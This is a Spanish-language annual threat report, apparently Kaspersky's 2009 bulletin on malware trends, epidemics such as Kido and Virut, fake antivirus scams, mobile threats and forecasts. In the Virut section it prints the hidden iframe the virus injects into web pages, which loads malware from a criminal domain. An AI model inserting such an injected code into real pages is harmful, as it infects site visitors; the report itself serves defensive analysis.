Kaspersky Security Bulletin: Boletín de seguridad 2009. Desarrollo de las amenazas informáticas en 2009

1. Kaspersky Security Bulletin: Boletín de seguridad 2009. Desarrollo de las amenazas informáticas en 2009
   • Tendencias del año
   • Resumen del año
     • Crece la complejidad
     • Epidemias
       • Ataques a los ordenadores de los usuarios
       • Infección de recursos web
     • Estafas informáticas
     • Programas maliciosos para plataformas y dispositivos alternativos
   • Pronósticos
2. Kaspersky: Boletín de seguridad Estadística general del 2009
3. Spam en 2009

Tendencias del año

2009 se ha convertido en un hito más en la historia de los programas maliciosos y de la delincuencia cibernética. Una vez más ha cambiado la dirección del desarrollo de ambos fenómenos. Este año se plantó el fundamento de lo que veremos en los próximos años.

En 2007-2008 se dejó de crear software nocivo sin ánimo de lucro. Los troyanos que roban información se convirtieron en el principal tipo de malware. Y a los delincuentes les resultaban muy interesantes los datos de los usuarios de juegos online: sus contraseñas, personajes y objetos de valor virtuales.

En los últimos 4 años China se convirtió en el principal proveedor de programas maliciosos. El hampa cibernética china resultó capaz de producir tal cantidad de programas nocivos, que estos dos últimos años todas las compañías antivirus, sin ninguna excepción, dedicaron la mayor parte de sus esfuerzos a luchar contra este torrente de amenazas.

Las estadísticas de las diferentes compañías pueden diferir (algunas toman en cuenta la cantidad de los ficheros, otras las firmas, otros los ataques), pero reflejan el impetuoso crecimiento de la cantidad de nuevos programas maliciosos en el pasado próximo. Así, según los datos de Kaspersky Lab, en 15 años (de 1992 a 2007) se detectaron cerca de dos millones de programas maliciosos únicos, pero sólo en 2008 se detectaron 15 millones.

En 2009 la cantidad de programas maliciosos incluidos en la colección de Kaspersky Lab alcanzó los 33.9 millones.

Cantidad de programas maliciosos en la colección de Kaspersky Lab

Durante 2007-2008 la cantidad de nuevas amenazas tuvo un crecimiento impetuoso. Como respuesta sólo se podía contraponer el aumento de la potencia de los centros de procesamiento antivirus (y el desarrollo de las tecnologías in-the-cloud antivirus), el desarrollo de nuevos medios de detección automática, la realización de nuevos medios de análisis heurístico, tecnologías de virtualización y de análisis de comportamientos. En una palabra la industria antivirus reaccionó creando nuevas tecnologías llamadas a mejorar la calidad de la defensa. Se puede afirmar que hemos sido testigos de una revolución tecnológica. La solución antivirus estándar de los años 90 del siglo pasado (escáner y monitor) que todavía en 2006 podía garantizar un nivel suficiente de seguridad, en 2009 es algo completamente obsoleto y ha sido reemplazado casi del todo por suites tipo Internet Security, que reúnen en un solo producto una serie de tecnologías de defensa de varios niveles.

Si en 2007-2008 el número de nuevas amenazas había crecido en progresión aritmética, en 2009 se detecto prácticamente la misma cantidad de programas que en 2008, es decir unos quince millones.

Cantidad de nuevos programas maliciosos detectados durante el año

Son varios los motivos de esta estabilización. El “boom” ocurrido en 2008 no solo estuvo condicionado por el activo desarrollo de la creación de virus en China, sino también por el continuo desarrollo de las tecnologías de infección de ficheros (que condujo al crecimiento del número de ficheros maliciosos únicos), como también por el desplazamiento del vector de los ataques hacia el campo de los navegadores de Internet.

En 2009 todas estas tendencias, si lugar a duda, seguían vigentes, pero se redujo el crecimiento cualitativo de los programas maliciosos. Por otra parte, se redujo la actividad de una serie de programas troyanos, por ejemplo, de los destinados a juegos en Internet. En lo que a ellos respecta, se ha cumplido el pronóstico que hicimos a finales del año pasado. Ya a principios de 2009 era evidente que el vaticinio era acertado.

El alto nivel de competitividad en este mercado, la reducción de las ganancias de los delincuentes y la lucha que dieron las compañías antivirus fueron los factores que condujeron a la reducción de la cantidad de los troyanos para juegos, hecho que a mediados de 2009 también fue mencionado por otras compañías antivirus.

Uno de los motivos de la reducción de los troyanos para juegos fue que las compañías que los producen empezaron a preocuparse de los problemas de seguridad y, al mismo tiempo, muchos usuarios tomaron por sí mismos medidas de protección contra estas amenazas.

La exitosa lucha de los órganos de seguridad estatales, las estructuras de supervisión, las compañías de telecomunicación y la industria antivirus contra el hosting y los servicios maliciosos también jugó su papel en la disminución de los programas maliciosos. Todo empezó a finales de 2008, cuando se clausuraron los servicios McColo, Atrivo, EstDomains y similares. En 2009 la lucha continuó y llevó a que se anularan las actividades de UkrTeleGroup, RealHost y 3FN.

Estos servicios tenían mala fama, porque prestaban diferentes servicios a delincuentes de toda calaña, que incluían soporte para centros de administración de botnets, recursos phishing, sitios con exploits, spammers, etc.

Por desgracia, la clausura de los hostings “grises” no garantizaba el cese completo de las actividades de los estafadores, ya que al poco tiempo éstos encontraban nuevos nichos. Pero mientras estaban ocupados en mudarse, Internet era menos peligroso.

Hasta el momento todo parece indicar que se conservará la tendencia notada y la cantidad de programas maliciosos únicos que se crearán en 2010 será similar a la de 2009.

Resumen del año

Los principales temas de 2009 fueron los programas maliciosos multifuncionales que incluían rootkits, las epidemias globales, el gusano Kido, los ataques web, las botnets web, las estafas con SMS y los ataques a las redes sociales.

Crece la complejidad

En 2009 los programas maliciosos se han hecho mucho más complicados. Por ejemplo, si antes las familias de programas maliciosos con funcionalidades de rootkit eran sólo unas cuantas decenas, en 2009 no solo se han propagado ampliamente, sino que también han avanzado mucho en su evolución. Entre ellos merece la pena destacar amenazas como Sinowal (bootkit), TDSS y Clampi.

Nuestros expertos vienen haciendo un seguimiento de Sinowal desde hace dos años y en primavera de 2009 detectaron una ola más de su propagación. Con su capacidad de camuflarse en el sistema y pasar inadvertido para los antivirus de entonces, este bootkit era el programa malicioso más avanzado del momento. Además, Sinowal oponía fuerte resistencia a los intentos emprendidos por las compañías antivirus para desactivar el centro de administración de su botnet.

El bootkit se propagaba mediante sitios craqueados, de pornografía y sitios de software pirata. Prácticamente todos los servidores desde los cuales se infectaba a los usuarios funcionaban en el marco de los así denominados “programas de partners”, que son esquemas de interacción entre los propietarios de los sitios web y los autores de programas maliciosos. Estas estructuras de “partners” son muy populares en el espacio cibernético ruso y ucraniano.

Otro programa malicioso, TDSS, encarnaba dos de las más complejas tecnologías: infectaba los drivers del sistema Windows y creaba su propio sistema virtual de ficheros, en el cual ocultaba su principal código malicioso. TDSS fue el primer programa capaz de incrustarse a tal profundidad en el sistema. Antes de él, no existía ningún programa malicioso de este tipo.

Clampi apareció en el campo de vista de los especialistas en verano de 2009, después de que se registraran casos de infección en varias importantes instituciones estatales y grandes compañías. Este programa nocivo aparecido por primera vez en 2008 y que, según algunos datos, es de procedencia rusa, está dirigido a robar los datos de cuentas de una serie de sistemas de banca online. La variante de 2009 se diferenciaba de sus predecesoras no solo por tener una estructura compleja, compuesta de varios módulos (y en mucho similar a la concepción encarnada en otro tristemente famoso troyano, Zbot), sino también por el en extremo refinado esquema de comunicación de la botnet, que cifraba el tráfico con el algoritmo RSA. Otra notable peculiaridad de Clampi era que usaba las utilidades estándar de Windows en la etapa de propagación de la epidemia dentro de las redes locales. Esto provocó varios problemas a determinados productos antivirus, que no podían bloquear las utilidades que estaban en la “lista de admitidos” y por lo tanto, eran incapaces de prevenir la infección.

Por desgracia, estas amenazas se caracterizan también por su altísimo nivel de difusión en Internet. Tanto Sinowal como Clampi habían logrado convertirse en epidemias globales, pero TDSS fue el causante de una de las más grandes epidemias de 2009. La variante más difundida fue Packed.Win32.Tdss.z, que apareció en septiembre y fue bautizada por su autor como TDL 3.

Epidemias

Nuestra compañía pronosticó que, en comparación con 2008, aumentaría el número de epidemias globales. Por desgracia, este pronóstico se confirmó en su totalidad. No sólo las amenazas mencionadas pudieron alcanzar el nivel de epidemia global, sino también toda una serie de peligrosos programas nocivos.

Ataques a los ordenadores de los usuarios

Los datos recopilados con la ayuda de Kaspersky Security Network nos permiten sacar la conclusión de que los siguientes programas lograron superar el límite de un millón de sistema atacados en 2009:

• Kido, gusano
• Sality, virus-gusano
• Brontok, gusano
• Mabezat, gusano
• Parite.b, virus de fichero
• Virut.ce, virus bot
• Sohanad, gusano
• TDSS.z, rootkit-backdoor

Sin duda, la epidemia más importante del año fue la causada por el gusano Kido (Conficker), que contagió millones de equipos en todo el mundo. Este gusano usaba varios métodos para penetrar al ordenador de la víctima: obtención de contraseñas de recursos compartidos, propagación mediante memorias flash y utilización de la vulnerabilidad MS08-067 de Windows. La lucha contra la botnet se complicaba porque Kido incorporaba las tecnologías virales más modernas y efectivas. En particular, una de las modificaciones del gusano recibía actualizaciones desde 500 dominios, cuyas direcciones se escogían aleatoriamente de una lista de 50.000 direcciones creadas diariamente, y como canal adicional de comunicación se utilizaban conexiones P2P. Kido impide la actualización de los programas de defensa, deshabilita los servicios de seguridad, bloquea al acceso a los sitios de las compañías antivirus, etc.

Según las apreciaciones de nuestros expertos, hasta aquel entonces había logrado infectar hasta 5 millones de ordenadores en todo el mundo. Kido no tenía funcionalidades para enviar spam ni organizar ataques DDoS. Los investigadores esperaban que esas funciones apareciesen el primero de abril, ya que era precisamente en esta fecha que la versión difundida en marzo debía empezar a hacer intentos de descargar módulos adicionales. No obstante, sus creadores prefirieron esperar algunos días y en la madrugada del 8 al 9 de abril enviaron a los equipos infectados la orden de usar sus conexiones P2P para actualizarse. Aparte de las actualizaciones de Kido, se instalaba dos programas más en los equipos infectados. El primero era el gusano de correo Email-Worm.Win32.Ikxmas, que se dedica a enviar spam. El segundo programa era un antivirus falso perteneciente a la familia Fraud.Tool.Win32.SpywareProtect2009, que exige dinero por eliminar los programas nocivos supuestamente detectados.

Merece la pena destacar que para hacer frente a una amenaza tan difundida se creó un grupo especial, el Conficker Working Group, que reunía a las compañías antivirus, proveedores de Internet, organizaciones independientes de investigación, institutos docentes y órganos reguladores. Este es el primer ejemplo de tan extensa colaboración internacional, que excede los límites de los contactos regulares entre los expertos antivirus y que puede servir de excelente fundamento para crear una organización permanente de lucha contra las amenazas informáticas que aterrorizan al mundo.

La epidemia de Kido continuó durante todo 2009. En noviembre la cantidad de sistemas infectados superó los 7.000.000.

Desarrollo de la epidemia causada por Kido
Fuente: www.shadowserver.org

Si tomamos en consideración la experiencia de los anteriores gusanos que operaban con principios similares (Lovesan, Sasser, Slammer), suponemos que la epidemia global de Kido seguirá en fase activa durante 2010.

Tampoco se debe dejar de prestar atención a la epidemia del virus Virut. La variante Virus.Win32.Virut.ce se caracteriza por tener como blanco a servidores web. También merece mención especial el mecanismo usado para inocular la infección: el virus no se limita a infectar los ficheros ejecutables con extensión .EXE y .SCR, sino que también escribe un código especial al final de los documentos del servidor infectado que tengan extensiones HTM, PHP y ASP, por ejemplo:
<iframe src=”http://ntkr(xxx).info/cr/?i=1″ width=1 height=1> </ iframe>

Al visitar un sitio web contagiado y sin sospechar nada, los usuarios activan el enlace, que a su vez descarga el contenido malicioso creado por los delincuentes. Además, el virus se propaga en las redes P2P junto con generadores de números de serie y distribuciones de programas populares. El propósito de la infección es reunir los equipos infectados en una botnet IRC que sirve para enviar spam.

Infección de recursos web

Una de las mayores epidemias en Internet, que afectó a decenas de miles de recursos web fue causada por varias olas de los “ataques Gumblar”. En la primera versión, el script infectaba las páginas web de sitios legítimos. Sin que el visitante se diese cuenta, el script remitía sus solicitudes al sitio de los delincuentes que difundían software malicioso.

Gumblar recibió su nombre del sitio malicioso al que se remitía a los usuarios durante el primer ataque y dónde se los infectaba.

Estos ataques se convirtieron en una brillante ilustración de las tecnologías Malware, que habíamos mencionado a principios de año.

En otoño, los delincuentes ponían en los sitios adulterados enlaces que ya no conducían a los sitios maliciosos, sino que dirigían a otros recursos legítimos infectados, algo que dificultó en gran manera la lucha contra la epidemia de Gumblar.

¿Por qué Gumblar se difunde con tanta rapidez? La respuesta es simple: se trata de un sistema completamente automatizado. Nos la estamos viendo con una nueva generación de botnets capaces de ajustarse por sí mismas. El sistema funciona como un ciclo cerrado. El sistema centra sus actividades en atacar sitios web y al lograr infectar los equipos de los usuarios, usa un fichero ejecutable en Windows para robar los datos de FTP del equipo del usuario. Después, los datos del servidor FTP se usan para infectar todas las páginas en nuevos servidores web. De esta manera, el sistema aumenta el número de páginas infectadas y, por lo tanto, infecta cada vez más y más ordenadores. El proceso íntegro está automatizado y el dueño del sistema sólo tiene que administrar su funcionamiento y actualizar el fichero troyano ejecutable que roba contraseñas y los exploits usados para lanzar ataques contra los navegadores.

Estafas informáticas

Los esquemas de estafas en Internet se hacen cada vez más variados. Al ya tradicional y tan propagado phishing se le suman diferentes sitios “grises” que ofrecen acceso de pago a servicios inexistentes. Y desgraciadamente, la palma se la lleva Rusia. Son precísamente los estafadores rusos quienes han industrializado la creación de sitios que ofrecen “averiguar el paradero de una persona usando GSM”, “leer la correspondencia privada en las redes sociales”, “recopilar información”, etc. La lista completa de todas las ofertas podría ocupar varias páginas. En todos los casos se requiere que el usuario envíe un mensaje de texto a un número de pago (pero no se explica que el coste del mensaje puede llegar a los 10 dólares americanos) o darse de alta en una lista de envíos, también enviando un SMS, después de lo cual cada día se retira dinero de la cuenta del teléfono celular.

En el pico de su actividad la cantidad de estos servicios alcanzaba varios centenares. Su funcionamiento estaba garantizado por decenas de “programas de partners”. Para atraer a los crédulos usuarios se utilizaba, aparte del tradicional spam en el correo electrónico, el spam en las redes sociales y los servicios de mensajería instantánea. Para efectuar los consiguientes envíos de spam los delincuentes organizaban ataques de virus y phishing para obtener acceso a las cuentas de las víctimas, creaban decenas de sitios de redes sociales falsificados, etc. Sólo a finales de 2009 estas actividades empezaron a encontrar una seria resistencia de parte de los proveedores de telefonía móvil, las administraciones de las redes sociales y las compañías antivirus.

Cuando describíamos a Kido, hicimos notar que durante su trabajo éste descargaba en el ordenador otro programa malicioso, un antivirus falso. La tarea de los seudoantivirus es convencer al usuario de que su equipo contiene amenazas (que en realidad no existen) y obligarlo a pagar dinero para activar el “producto antivirus”. Mientras más se parezca la imitación del funcionamiento a la del software legal, más posibilidades tendrán los estafadores de recibir un pago por el “trabajo” de su pseudoantivirus.

En 2009 la popularidad de los seudoantivirus siguió creciendo entre los estafadores. Para propagarlos, no sólo se usan otros programas maliciosos, sino también la publicidad en Internet. Actualmente, muchos sitios ponen banners con información sobre un nuevo y “mágico” producto que le solucionará todos sus problemas. Hasta en algunos recursos legítimos se pueden encontrar titilantes banners o pertinaces anuncios flash de un “nuevo antivirus”. Además, durante la navegación en Internet, en el navegador pueden saltar ventanas emergentes que ofrecen descargar gratis un antivirus.

El surgimiento y la extensa difusión de falsos antivirus están condicionados, en primer lugar, por que es fácil desarrollarlos, por la existencia de un efectivo sistema de difusión y las grandes ganancias que los estafadores reciben en poco tiempo. Según la apreciación de la CIA presentada en noviembre de 2009, los delincuentes ganaron en total 150 millones de dólares con los falsos antivirus.

En el presente la colección de Kaspersky Lab tiene más de 300 diferentes familias de antivirus falsos.

Programas maliciosos para plataformas y dispositivos alternativos

En lo que concierne a las plataformas alternativas (por ejemplo, sistemas operativos móviles y Mac OS) en 2009 los delincuentes las siguieron analizando. La compañía Apple prestó atención a las amenazas para Mac poniendo una especie de scaner antivirus en la nueva versión de su sistema operativo (antes, los representantes de Apple afirmaban que los programas maliciosos no eran una amenaza para Mac OS), mientras que en el mundo de las plataformas móviles la situación dista mucho de ser clara. Por una parte, en 2009 tuvieron lugar eventos pronosticados hace mucho tiempo: se detectaron los primeros programas maliciosos para iPhone (el gusano Ike), se creó el primer programa espía para Android y se registraron los primeros incidentes causados por programas maliciosos con firmas digitales para smartphones Symbian. Por otra parte, continúa la lucha por el mercado de los sistemas operativos, lo que dificulta que los autores de virus se concentren en uno de ellos.

En 2009 nuestra compañía detectó 39 nuevas familias y 257 nuevas modificaciones de programas maliciosos para dispositivos móviles. En comparación, en 2008 detectamos 30 nuevas familias y 143 nuevas modificaciones. La dinámica mensual de detección de estas amenazas tiene el siguiente aspecto:

Dinámica mensual de aparición de nuevas modificaciones (2008-2009)

En el artículo “Virología móvil, parte III” analizamos los principales acontecimientos en el segmento de los programas maliciosos para teléfonos celulares. Entre los eventos y tendencias más notables de 2009 podemos destacar:

• el surgimiento de un mercado “monetizado” de programas maliciosos para dispositivos móviles;
• la aparición de software nocivo con firma digital para Symbian S60 3rd edition;
• diferentes tipos de estafas con mensajes de texto SMS;
• la aparición de diferentes programas maliciosos con fines de lucro capaces de establecer contacto remoto con los servidores de los delincuentes.

Podemos decir que, en el campo de los programas maliciosos para dispositivos móviles, los programas maliciosos capaces de comunicarse con los servidores remotos de los delincuentes son el fenómeno más brillante del segundo semestre de 2009. Ellos aparecieron gracias a la difusión de las redes telefónicas y el acceso barato a Internet: ambos factores permiten que los usuarios de smartphones y teléfonos móviles ingresen con gran frecuencia a Internet.

La comunicación de los programas maliciosos móviles con los servidores remotos les abre nuevas posibilidades a los delincuentes:

1. Los troyanos SMS que envían mensajes de pago a números premium pueden obtener de los servidores remotos los parámetros de los mensajes a enviar. Si el operador bloquea el sufijo (número corto), no hay necesidad de actualizar el programa malicioso. Es suficiente comprar un nuevo prefijo y ponerlo en el servidor.
2. Los programas maliciosos instalados en dispositivos móviles pueden recibir actualizaciones desde el servidor remoto.
3. La comunicación de los programas nocivos móviles con servidores remotos puede ser el primer paso para construir botnets con los dispositivos móviles infectados.

Consideramos que en 2010 esta tendencia seguirá desarrollándose y que nos encontraremos con una gran cantidad de programas nocivos que usarán la conexión a Internet para plasmar su potencial malicioso.

Un suceso excepcional ocurrido en 2009 fue la detección del programa troyano Backdoor.Win32.Skimer. En realidad, el incidente ocurrió a finales de 2008, pero sólo se divulgó en la primavera de 2009. Es el primer programa malicioso para cajeros automáticos. Después de la infección, el delincuente puede realizar una serie de acciones con una tarjeta especial: recibir todo el dinero que se encuentre en el cajero automatico, obtener los datos sobre las tarjetas de los usuarios y hacer transacciones a través del cajero infectado. Es evidente que el troyano lo escribió una persona que conoce bien el software y hardware de los cajeros automáticos. El análisis del troyano nos hace suponer que está orientado a los cajeros instalados en Rusia y Ucrania, porque hace un seguimiento de las transacciones en dolares americanos, rublos rusos y hrivnas ucranianas.

Existen dos vías para que el código ingrese a los cajeros: acceso físico directo al sistema del cajero o acceso mediante la red interna del banco a la que están conectados los cajeros automáticos. Un antivirus común y corriente puede contrarrestar este backdoor, por eso los expertos de Kaspersky Lab recomiendan a todos los bancos hacer un análisis antivirus de sus redes de cajeros automáticos.

Pronósticos

ВEn nuestra opinión, en 2010 los principales problemas y sucesos serán:

Desplazamiento del vector de los ataques: se dejarán de lado los ataques web y se harán más ataques por redes P2P. Esto es una consecuencia de la evolución de los medios de defensa y, al mismo tiempo, un paso obligado en la cadena cronológica: 2000-2005, ataques por correo electrónico; 2005-2006, ataques por Internet; 2006-2009, ataques por sitios web (incluyendo redes sociales). Ya en 2009 una serie completa de epidemias virales masivas se basaba en la propagación de ficheros maliciosos a través de redes Torrent. De esta manera no sólo se propagaban amenazas tan notables como TDSS y Virut, sino que también lo hacían los backdoors para MacOS. En 2010 esperamos un crecimiento significativo de estos incidentes en las redes P2P.

1. 1. La lucha por el tráfico. Los delincuentes cibernéticos hacen cada vez más esfuerzos para legalizar su negocio y en Internet hay muchas formas de ganar dinero con los grandes volúmenes de tráfico especial creado por las botnets. Si bien ahora la lucha por el tráfico se realiza sobre todo entre los servicios delictivos, se espera que en el futuro aparezcan esquemas semilegales de lavado de dinero en las botnets. Los así denominados “programas de partners” les dan a los usuarios de las botnets la posibilidad de “monetizar” su trabajo, incluso sin echar mano de servicios criminales como el envío de spam, los ataques DoS y la difusión de virus.
2. 2. Epidemias. Las principales causas de las epidemias seguirán siendo las vulnerabilidades, pero no sólo en los programas de compañías como Adobe y Apple, sino también en Windows 7, lanzada recientemente al mercado. Merece la pena destacar que últimamente los productores de software han empezado a prestar mucha más atención a la búsqueda de errores en sus programas. Si no se detectan vulnerabilidades serias, 2010 puede convertirse en uno de los años más tranquilos de estos últimos tiempos.
3. Los programas maliciosos se harán aún más complejos. Incluso ahora existen amenazas que utilizan modernas tecnologías virales para infectar ficheros y que tienen funciones de rootkit. Muchos programas antivirus no son capaces de curar los sistemas infectados por estos programas maliciosos. La situación no hará más que empeorar. Por una parte, las tecnologías antivirus se desarrollarán de tal manera que harán muy difícil que las amenazas entren en el sistema, por otra parte, aquellas amenazas que – a pesar de todo – logren evadir los sistemas de seguridad serán prácticamente invulnerables.
4. Al igual que lo que pasó con los troyanos para juegos, se reducirán las actividades de los antivirus falsos. Estos programas, que aparecieron por primera vez en 2007, alcanzaron la cima de su crecimiento en 2009 y fueron los causantes de una serie de grandes epidemias. En el presente, el mercado de los antivirus falsos está sobresaturado y las ganancias de los estafadores son mínimas. La gran atención que la industria antivirus y los órganos estatales le prestan a estos programas también les complica la existencia.
5. En el campo de los servicios web, el tema del año será Google Wave y los ataques que usen este servicio. Sin lugar a dudas, su desarrollo se realizará según el esquema que ya se ha convertido en norma: primero el spam, después los ataques phishing seguidos de la explotación de las vulnerabilidades y la propagación de programas maliciosos. También representa gran interés el lanzamiento del sistema operativo Chrome OS, pero este año no esperamos que los delincuentes le presten gran atención a esta plataforma.
6. Se espera que las plataformas móviles iPhone y Android tengan un año bastante complicado. La aparición en 2009 de las primeras amenazas para ellas es un indicio de que el interés de los delincuentes por estas plataformas está creciendo. Y si para iPhone el grupo de riesgo está compuesto por los usuarios de dispositivos hackeados, para la plataforma Android no existe esta limitación, porque sus aplicaciones se pueden instalar desde cualquier fuente. La creciente popularidad de los teléfonos con este sistema operativo en China y el débil control tecnológico de las aplicaciones publicadas provocará que en 2010 haya notables incidentes virales.